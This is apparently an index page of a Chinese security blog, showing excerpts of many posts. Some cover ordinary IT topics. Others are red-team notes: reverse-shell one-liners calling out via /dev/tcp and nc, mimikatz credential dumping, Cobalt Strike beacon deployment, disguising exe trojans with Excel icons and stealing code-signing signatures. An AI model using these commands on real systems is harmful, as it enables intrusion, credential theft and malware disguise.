Shanfenglan's blog

过程1. 安装bindyum install -y bind2. 修改配置文件1. /etc/name.conf将其中所有的localhost改为any2. /etc/name.rfc1912.zoneszone "test.com" IN { type master; file "test.com.zone"; allow-update { none; };};zone "171.168.192.in-addr.arpa" IN {

1. 什么是spring?Spring是一个支持快速开发Java EE应用程序的框架。2. 什么是spring boot?Spring Boot是一个基于Spring的套件，它帮我们预组装了Spring的一系列组件，以便以尽可能少的代码和配置来开发基于Spring的Java应用程序。本质上还是使用的spring框架,只是通过spring boot来使用的话,学习成本低很多,少了很多配置上的困难.3. 什么是spring cloud?一套基于spring boot的专门用于微服务的开发框架,sp

1. 政务云电子政务云是为政府部门搭建一个底层的基础架构平台，把传统的政务应用迁移到平台上，去共享给各个政府部门，提高它的服务效率和服务的能力。考虑到电子政务系统在安全方面的特殊要求，电子政务云更适合选择私有云。公共服务云定位为由政府主导，整合公共资源，为公民和企业的直接需求提供云服务的创新型服务平台。根据公共服务的行业又可对公共服务云进行细分，如医疗云、社保云、园区云等。公共服务云需要整合各种公共资源，适宜部署到公有云中。一句话概括就是政府部门使用云技术实现的业务场景。不使用过去的物理机房，而是使用

文章目录1. 安装svn2. 创建版本库3. 更改配置4. 添加svn用户名密码5. 修改authz配置文件6. 启动svn7. 连接svn1. 安装svnsudo apt-get install subversion2. 创建版本库先在桌面创建一个文件夹:touch /root/Desktop/test执行命令：sudo svnadmin create /root/Desktop/test3. 更改配置更改conf/svnserve.conf文件的配置，添加如下配置：#匿名用

文章目录dllmainrundll32regsvr32dllmain这个函数里面有四个判断点，分别是：当进程调用dll时当进程释放dll时当线程调用dll时当线程释放dll时每触发一个判断点都会触发对应的函数，不过这些函数本身是个空函数，需要被重写才有价值，因此我们可以重写对应函数来实现我们想要的功能。rundll32可以直接调用dll文件中的某个函数，命令格式为Rundll32.exe DLLname,Functionname Arguments，DLLname为需要执行的DLL文件

前言选择事业时需考虑的四个需求选择一份怎样的事业，是一个永恒的难题。许多人会说，找自己喜欢的就行了。另外一些人会说，你要找一个有前途的工作。另外一些值得考虑的元素有，归属感，福利好，有意义有价值，为社会贡献，等等。看起来我们有无数的标准。但在观察与分析总结之后，我发现，我们试图从工作中满足四个需求。但是，对于不同的人，侧重点会不同。从普遍意义上来讲，能力越强，年龄越大，会越侧重后面几个需求。需要一：填饱肚子当一个人长期吃不饱饭的时候，往往他惟一关心的是能给自己多少钱，能否填饱自己的肚子。

1. 前言如果有需求做excel图标的exe木马，我们肯定会需要excel的原生图标，这里提供一种提取方式。2. 提取图标过程1.下载好压2345http://haozip.2345.com/ 2.使用excel打开excel.exeexcel.exe默认路径是在C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE。进入rsrc文件夹：进入ICON文件夹：即可看到图标文件：我们使用最大的图标即可，分辨率为96

1. 什么是蜜罐站在攻击者角度蜜罐就是一台主机或者说一个互联网资产，例如一个数据库、一个web网站、一个服务等站在防御者角度蜜罐就是一个启动在主机上的服务，或者说一个docker镜像，它承担着牺牲自己来获取攻击者数据的作用，大多数情况的蜜罐本身并没有什么攻击作用，更多是一种信息收集兼“挨打”的设备，换句话说。2. 蜜罐的工作原理蜜罐分为很多种，不同的蜜罐有不同的工作方式，但最终目的都是诱使黑客对其进行攻击。，每一个蜜罐都会暴露一些或难或易的漏洞给攻击者，等待攻击者去攻击。攻击者对其进行攻击的时候

前言今天在公众号上发现了一个比较完善的用法，所以记录一下。nmap用法摘录自：https://mp.weixin.qq.com/s/ph8b0oA31f_HyzltnKxqdA0x01 目标规格nmap 192.168.1.1 扫描一个IPnmap 192.168.1.1 192.168.2.1 扫描IP段nmap 192.168.1.1-254 扫描一个范围nmap nmap.org

文章目录1.前言2. 数字签名修改方式2.1 自己给程序加签名2.2 盗取他程序的签名给自己的程序使用3.修改详细信息与编译时候修改程序图标参考文章1.前言数字签名：详解信息：2. 数字签名修改方式2.1 自己给程序加签名工具：https://github.com/shanfenglan/test/tree/master/signtools命令：执行的时候请关闭杀毒软件makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer

文章目录0x01.基础操作1.加速镜像2.拉取镜像3.操作记录3.1 操作镜像使其生成一个容器并以交互式命令行的状态进入容器3.2 查看所有容器3.3 启动一个停止了的容器3.4 后台启动容器3.5 停止容器3.6 进入后台启动的容器3.7 导出和导入容器3.8 删除容器4. 拉取一个web应用4.1 运行一个web应用4.2 查看某个容器的端口映射情况4.3 查看容器的web日志4.4 查看容器的进程4.5 检查web应用程序0x02 镜像image相关其他操作1. 使用镜像的不同版本2. 删除镜像3.创

文章目录1.前言2.devops3.devsecops3.1 SDL3.2 devops对SDL的挑战3.3 DevSecOps原则1.安全左移2.默认安全3.运行时安全4.安全服务自动化/自助化5.基础设施即代码6.利用持续集成和交付7.需要组织和文化建设4.devsecops实践参考文章1.前言时常看到devops、devsecops可以一直没有用心研究过，今天对其做一个小小的研究与总结。2.devopsdevops的中文含义是development & operation，也就是开发与

文章目录1. 前言2. 什么是web services3. 为什么要使用web services4. web services分类5. soap、wsdl、xsd是什么？5.1 soap5.2 wsdl5.3 XSD6. 参考文章1. 前言今天开启msf的时候发现有个web services服务，过去一直没怎么注意过这次决定好好了解一下，于是有了这篇文章。2. 什么是web servicesWeb Services 是应用程序组件Web Services 使用开放协议进行通信(http)Web

工具how-does-Xmanager-encrypt-password实现xshell配置文件位置：xshell7: C:\Users\%username%\Documents\NetSarang Computer\7\Xshell\Sessionsxshell6: C:\Users\%username%\Documents\NetSarang Computer\6\Xshell\SessionsXShell5: %userprofile%\Documents\NetSarang

文章目录0.前言1.最早期人工防护2.利用检测系统与流量清洗设备3.全自动化设备4.防护对抗思路参考文章0.前言论持久战——带你走进腾讯DDoS防护体系的读后总结。1.最早期人工防护此时检测与防护可能都是人工的，当管理员发现计算机被攻击后开始联系技术人员，让技术人员过来做iptables进行流量过滤。如下图：iptables解决问题简单粗暴，但也容易把正常用户拦截在外，总的来说就是不够灵活，但在初期确实是解决DDos问题的一大手段。不过随着时间的推移，机房的机器越来越多，单单靠iptables

文章目录1. 前言2. 什么是DDos3. 死亡之ping补充：CC攻击4. DDos攻击的分类4.1.Flood型DDos攻击4.2.反射型DDos攻击4.3.协议层面的攻击补充：云业务相关的DDos攻击的解决方案5. DDos攻击涉及到的业务6.总结7.参考文章1. 前言刚接触网络安全行业就听到过DDos这个词汇但是没有深入了解过，今天看了别人的文章，对DDos有了一点点自己的理解，于是写下这篇文章做一个记录。2. 什么是DDos全名是分布式拒绝服务攻击(Distributed Denial o

CATALOG1.前言2.三次握手3.四次挥手4.参考文章1.前言网络通信的实体是不同主机之间进程的通信，也就是端到端通信，其过程借助于TCP或者UDP协议，基于端口。倘若利用TCP协议，则传输前有三次握手，传输后有三次挥手，是一个可靠传输。倘若利用UDP协议，传输前不需要建立连接，对方收到后也不需要发送确认，是一个不可靠的传输，但是胜在消耗资源少，速度快。2.三次握手首先我们需要知道为什么要三次握手而不是两次。原因是为了防止之前传输过的请求连接的数据包延时到达服务器后,服务器再次创建新的连接而

CATALOG前言常用命令1.Get-Domain2.Get-DomainController3.Get-NetUser4.Get-NetLocalGroup其他前言很久前就知道了这个脚本，可惜一直没有抽空去研究它的用法，今天决定完成这件事。常用命令进入powershell改变当下执行策略：Set-ExecutionPolicy Bypass -Scope Process加载模块：. .\PowerView.ps1命令：1.Get-Domain获取域的信息2.Get-DomainCo

1.echo命令会覆盖之前文件里面的东西

CATALOG前言windows相关上线方式1.利用mshta与wmic上线2.利用powershell上线3.利用msbuild上线linux相关上线方式1.利用Cross2上线linux主机前言CS上线方式还是有不少的，但是时间长不看容易忘记一部分，博客记录也比较分散导致找起来比较麻烦，因此写了这篇博客记录一下CS上线的相关知识点。windows相关上线方式1.利用mshta与wmic上线不用powershell执行powershell脚本与xsl文件不落地上线2.利用powershell上

CATALOGssh端口转发其他在meterpreter上配置路由配置proxychainsewssh端口转发一些命令参数-C 压缩数据传输-f 后台登录用户名密码-N 不执行shell[与-g 合用] -g 允许打开的端口让远程主机访问在一台公网服务器上编辑 sshd 配置，开启 ssh 转发功能,重启 ssh 服务，这是所有使用 ssh 隧道转发前的必备操作：vim /etc/ssh/sshd_configAllowTcpForwarding yesGatewayPorts yes

前言在管理员权限下使用，如果没有管理员权限，基本每个功能都无法正常使用，切记。命令普通管理员权限可以执行的命令(密码查询与权限检测与日志记录)lsadump::lsa /inject 可以查看所有用户的所有详细信息privilege::debug 打开第一个命令，且必须执行。log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。sekurlsa::logonpasswords 列出已登陆用户的密码（比较常用）域控权限才能执行的命令lsadump::dc

解决反弹shell乱码chcp 65001 #修复乱码文件融合copy Trace.exe/b +beacon.exe/a 2.exe #将Trace与beacon融合成为 2.exe，由于破坏了pe结构所以无法执行。日常运维任务管理器taskmgr桌面进程 explorer组策略设置:gpedit.mscappwiz.cpl添加与删除sysdm.cpl 系统属性页面可以配置环境变量tasklist /svc #查看当前的任务列表taskkill /f /pid 123 #

findfind /bin/ -name ls -exec /bin/nc -lvp123 ;find /bin/ -name ls -exec /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 ;find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nulllessless /etc/passwd!/bin

完整命令反弹shell命令：bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell：nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&1 2>&1bash -i 打开一个交互式的bash&是为了

附录linux命令大全https://man.linuxde.net/pwdpwd #查看当前工作文件夹路径nodejsnode.js安装后要执行的操作：ln -s /usr/local/myapp/nodejs/bin/npm /usr/local/bin/geditgedit #打开一个文本框来编辑文本setsidsetsid nohup python3 test.py & #代表这个脚本不会随着命令行等关闭而关闭，会一直在后台运行lsls -lht #查看当前目录下.

端口协议/服务攻击技巧21/22/69ftp/tftp：文件传输协议爆破嗅探溢出；后门22ssh：远程连接爆破OpenSSH；28个退格23telnet：远程连接爆破嗅探25smtp：邮件服务邮件伪造53DNS：域名系统DNS区域传输DNS劫持DNS缓存投毒DNS欺骗深度利用：利用DNS隧道技术刺透防火墙67/68dhcp劫持欺骗110pop3爆破139samba爆破未授权访问远程代码执行143imap...

什么是组策略组策略与工作组没关系，它是许多策略的集合，组策略的组代表的是一组或者说多个，并不代表工作组的组。例如本地安全策略就是组策略的一部分。ou是组织单元，组策略可以下发给ou可以给域可以给站点等。优先级ou最高一次递减。但子ou的优先级比父ou高（默认情况）。组策略相当于一张任务计划书。可以分配给不同的部门。组策略大体分为如下几种：域内组策略在DC直接在服务器管理下面点的那个“组策略管理”即可管理域内组策略，这个组策略只对域内的主机有用。命令行的命令为gpmc.msc。 它的作用是

ssh端口转发一些命令参数-C 压缩数据传输-f 后台登录用户名密码-N 不执行shell[与-g 合用] -g 允许打开的端口让远程主机访问在一台公网 VPS 上编辑 sshd 配置，开启 ssh 转发功能,重启 ssh 服务，这是所有使用 ssh 隧道转发前的必备操作：vim /etc/ssh/sshd_configAllowTcpForwarding yesGatewayPorts yesTCPKeepAlive yesPasswordAuthentication yes#sy

漏洞练习平台WebGoat漏洞练习平台：https://github.com/WebGoat/WebGoatwebgoat-legacy漏洞练习平台:https://github.com/WebGoat/WebGoat-Legacyzvuldirll漏洞练习平台：https://github.com/710leo/ZVulDrillvulapps漏洞练习平台：https://github.com/Medicean/VulAppsdvwa漏洞练习平台：https://github.com/